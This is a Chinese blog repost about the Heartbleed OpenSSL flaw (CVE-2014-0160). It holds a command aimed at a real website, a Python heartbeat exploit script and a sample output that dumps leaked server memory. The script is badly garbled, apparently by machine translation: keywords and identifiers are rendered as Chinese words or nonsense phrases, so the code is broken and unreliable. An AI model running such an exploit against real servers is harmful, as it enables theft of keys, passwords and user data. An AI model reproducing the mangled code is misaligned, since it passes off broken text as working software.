怎么找网站漏洞,如何对网页漏洞进行测试

  怎么找网站漏洞,如何对网页漏洞进行测试

  Heartbleed错误是一个严重的漏洞。这个弱点可以窃取信息。正常情况下,互联网受SSL/TLS加密保护。Heartbleed error允许任何人在互联网上读取系统内存保护较弱的OpenSSL软件版本。该折衷密钥用于识别服务提供商和加密流量的实际内容、用户名和密码。这使得攻击者能够窃听通信,直接从服务和用户窃取数据,并模拟服务和用户。

  监控命令:

  python h b-test . py www.cnblogs.com/javame监控脚本:

  #!/usr/柔弱的小甜瓜/env python 2 #贾里德斯塔福德(js企鹅@ js企鹅。组织)对CVE-2014-0160的快速而肮脏的演示#作者声明对此源代码不享有版权import sys import struct import socket import time import select import ref om opt parse import option parser import option parser(用法= % Prog server[options],描述=测试SSL心跳漏洞(CVE-2014-0160))选项。add _ option(-p ,- port ,type=柔弱的小甜瓜(十):返回x.replace( , ).替换( n , ).decode(hex)hello=h2柔弱的小甜瓜( 16 03 02 00 DC 01 00 00 D8 03 02 5343 5b 90 9d 9b 72 0b BC 0c BC 2b 92 A8 48 97 cfbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 D4 0000 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 8800 87 c0 0f c0 05 00 35 00 800 c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 00 2f 00 96 00 41 c0 11 c0 07 c0 0cc 0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 1100 08 00 00 06 00 03 00 ff 01 00 00 00 40 00 1900 00 00 00 00 00 00 09 00 00 04 00 05 00 12 00 1300 01 00 02 00 03 00 00 00 00 00 11 00 23 00 00 00 0000 00 00 01 01 )HB=H2柔弱的小甜瓜( 18 03 02 00 0301 40 00 )def hex dump:for b in x range(0,len(s),16):Lin=[c for c in s[b:b 16]]]hxdat= . join(x % order(c)for c in Lin)pdat= .join((c if 32=ord(c)=126 else 。)for c in lin) print x: %-48s %s % (b,hxdat,pdat) printdef recvall(s,length,time out=5):end time=time。time()超时rdata= remain=长度,同时保持0:rtime=结束时间-时间。time()if rtime 0:return none r,w,e=select.select([s],[],[],5)if s in r:data=s . recv(remain)# eof?如果不是数据:return None rdata=data remain-=len(data)return rdata def recvmsg(s):HDR=recvall(s,5)如果直接热轧制为无:打印意外的文件结束接收记录头-服务器关闭的连接return None,None,None typ,ver,ln=struct.unpack(BHH ,hdr) pay=recvall(s,ln,10)如果支付为无:打印意外的文件结束接收记录有效负载-服务器关闭的连接不返回,不打印.收到的消息:type=%d,ver=x,len=% d %(typ,ver,len(pay)) return typ,ver,pay def hit _ HB(s):s . send(HB)while true:typ,ver,pay=recvmsg(s)如果典型为无:打印未收到心跳响应,服务器可能不容易受到攻击如果typ==24:print 收到的心跳响应: hex dump(pay)if len(pay)3:print 警告:服务器返回了比它应该返回的更多的数据-服务器容易受到攻击!否则:打印服务器处理了格式错误的心跳,但没有返回任何额外的数据。如果typ==21,则返回真:打印已收到警报: hexdump(支付)打印服务器返回错误,可能不容易受到攻击返回错误的.测试结果:

  连接.向客户端发送问候.等待服务器你好.收到的消息:类型=22,版本=0302,长度=58.收到的消息:类型=22,版本=0302,长度=2338.收到的消息:类型=22,版本=0302,长度=525.收到的消息:类型=22,版本=0302,长度=4发送心跳请求.收到的消息:类型=24,版本=0302,长度=收到的心跳响应:0000:02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@.SC[.r.0010:公元前2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .H.9.0020:9F 77 04 33 D4 00 00 66 C0 14 C0 0A C0 22 C0西部3.f.0030:21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00!9.8..5.0040:84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0...

  转载于:https://www。cn博客。com/Javame/p/3756895。超文本标记语言

怎么找网站漏洞,如何对网页漏洞进行测试